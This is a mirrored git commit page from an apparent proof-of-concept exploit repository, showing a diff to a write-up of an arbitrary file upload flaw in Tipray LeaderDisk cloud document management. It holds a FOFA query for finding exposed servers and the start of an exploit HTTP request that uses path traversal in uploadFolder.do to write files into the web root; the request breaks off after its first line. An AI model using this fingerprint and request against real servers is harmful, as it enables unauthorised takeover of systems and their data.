mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-04 18:06:34 +00:00
Update 天锐绿盘云文档安全管理uploadFolder存在文件上传.md
This commit is contained in:
parent
e3404db1bc
commit
113ae22df5
@ -3,9 +3,9 @@
|
||||
天锐绿盘云文档安全管理存在任意文件上传漏洞,可以获取服务器权限
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="/lddsm/" || title="天锐绿盘" || title=="Tipray LeaderDisk"||body="location.href=location.href+\"lddsm\""
|
||||
|
||||
```
|
||||
## poc
|
||||
```javascript
|
||||
POST /lddsm/service/../admin/activiti/uploadFolder.do?taskId=../webapps/ROOT/&relativepath=1&path=1 HTTP/1.1
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user